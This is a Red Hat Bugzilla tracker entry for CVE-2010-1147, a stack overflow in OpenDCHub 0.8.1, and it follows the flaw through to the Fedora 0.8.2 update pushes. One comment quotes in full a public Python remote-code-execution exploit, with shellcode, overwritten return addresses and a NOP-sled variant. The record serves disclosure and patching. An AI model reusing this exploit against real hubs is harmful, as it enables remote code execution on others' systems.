Bug 579206 (CVE-2010-1147)

Summary: CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: NEW --- QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: singh.roshan08
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
URL: http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
Whiteboard: impact=moderate,source=debian,reported=20100402,public=20100331,cvss2=5.5/AV:N/AC:L/Au:S/C:N/I:P/A:P
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Bug Depends On: 579207    
Bug Blocks:    

Description Jan Lieskovsky 2010-04-03 05:11:37 EDT
Pierre Nogues found a stack overflow flaw, in the way Open DC Hub
sanitized content of user's MyINFO message. Remote attacker, 
with valid Open DC Hub account, could send a specially-crafted
MyINFO message to another user / all users connected to particular
Direct Connect network, leading into denial of service (opendchub
crash) or, potentially, to arbitrary code execution with the privileges
of the user running opendchub.

References:
  [1] http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
  [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308

CVE Request:
  [3] http://www.openwall.com/lists/oss-security/2010/04/03/1
Comment 1 Jan Lieskovsky 2010-04-03 05:13:08 EDT
Public PoCs by Pierre posted in [1]:

#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
#     OpenDcHub is a direct connect hub for Linux
#
#     OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
#     OpenDcHub 0.8.1
#
# Plateforms :
#     Unix
#
# Usage :
#     ./exploit.py
 
import socket
 
host = '192.168.1.9'
port = 5000
 
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24" 
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d" 
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75" 
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2" 
shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc" 
shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29" 
shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b" 
shellcode+="\x2b"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")
 
hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
hax+="S:-1|"
 
s.send(hax)
s.close()
 
"""
# V2
# more complex version working too, it have more space for the shellcode
 
hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+=shellcode
hax+="|"
"""
Comment 2 Jan Lieskovsky 2010-04-03 05:14:30 EDT
This issue affects the versions of the opendchub package,
as shipped with Fedora releases of 11 and 12.

Please fix.
Comment 4 Jan Lieskovsky 2010-04-06 03:40:05 EDT
This is CVE-2010-1147.
Comment 5 Roshan Singh 2010-04-08 13:56:51 EDT
I have fixed the bug, and created the RPM, but I forgot to put the CVE ids in the RPM changelog. Do I need to recreate the RPM ?
Comment 6 Jan Lieskovsky 2010-04-08 14:13:58 EDT
Hi Roshan,

  I can see "- New release with fix for buffer overflow" in
the Changelog, which should be sufficient. (some further
guide information is available also here:
  [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0)

But please, by submitting request to Bodhi, be sure to 
mention the "CVE-2010-1147" identifier in the "Update Information"
field, together with #579206 (this bug) within the "Bugs Fixed"
field.

Thanks && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team
Comment 7 Fedora Update System 2010-04-08 14:29:28 EDT
opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc11
Comment 8 Fedora Update System 2010-04-08 14:30:31 EDT
opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc12
Comment 9 Fedora Update System 2010-04-08 14:31:49 EDT
opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc13
Comment 10 Roshan Singh 2010-04-09 00:26:58 EDT
I have deleted these updates, I had uploaded the wrong tar ball to sourceforge, luckily nobody had downloaded it till then, I will update the RPM by today.

I am sorry for the inconvenience.
Comment 11 Fedora Update System 2010-04-10 13:25:09 EDT
opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc12
Comment 12 Fedora Update System 2010-04-10 13:25:13 EDT
opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc11
Comment 13 Fedora Update System 2010-04-10 13:25:17 EDT
opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc13
Comment 14 Fedora Update System 2010-04-30 13:10:57 EDT
opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 15 Fedora Update System 2010-04-30 13:18:50 EDT
opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.